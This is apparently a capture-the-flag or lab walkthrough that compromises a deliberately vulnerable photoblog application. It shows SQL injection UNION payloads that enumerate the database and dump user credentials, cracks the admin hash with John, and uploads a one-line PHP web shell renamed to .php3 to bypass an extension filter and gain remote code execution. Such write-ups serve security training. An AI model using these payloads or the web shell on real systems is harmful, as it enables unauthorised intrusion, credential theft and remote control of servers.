root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Task

image

Navigate to the webpage,

image

Click on “pool”, you should get this url

image

Checking if it is vulnerable to SQLi, just add ' at the back of 3. This should trigger a SQL error

image

We’ll be exploiting this from the webpage

Lets check for the number of columns available in the database. We can use the query

order by 1 -- 
order by 2 --
order by 3 --

Using these queries

image

This means we don’t have a 5th column in the database, which means we have just 4 columns.

Lets check for the column that is compatible with string data, that is the vulnerable column. We can use the query

AND 0 UNION SELECT 1,2,3,4-- -

This query should return the vulnerable column

image

We can see that column 2 is the vulnerable one.

Checking for the name of the database, we can use the query

UNION SELECT 1,database(),3,4-- -

image

We got the name of the database to be photoblog

Checking for the “tablename”, we can use the query

UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema="photoblog"-- -

Trying this query

image

We got the tables available in the database, but the interesting one is the users table.

Checking for column name available in the users table, we can use the query

UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_schema="photoblog" AND table_name="users"-- -

Trying this query

image

We got interesting column names, lets dump the contents of these columns. We can use the query

UNION SELECT 1,CONCAT(login,0x3a,password),3,4 FROM users-- -

You should get this

image

We got the hash for the admin user. Lets save this in a file, then we use John to crack it

image

We got the admin password.

Logging in to the webserver

image

We are logged in.

We can go ahead to add a picture

image image

Lets try to upload a php script, we’ll be using this simple payload

<?php system($_GET['cmd']); ?>

Save this in a file, then we’ll try to upload it

image image image

Alrigt, so “.php” extensions aren’t allowed. Lets change the extension to something else, say .php3

image

Lets try to upload this again

image image

Our script got uploaded successfully

Navigating to the path where the script was uploaded to

image image

We have successfully gained Remote Code Execution on this webserver.

To complete this exercise, we have to run the binary

image image

We have successfully completed this exercise, it was a fun and easy one😎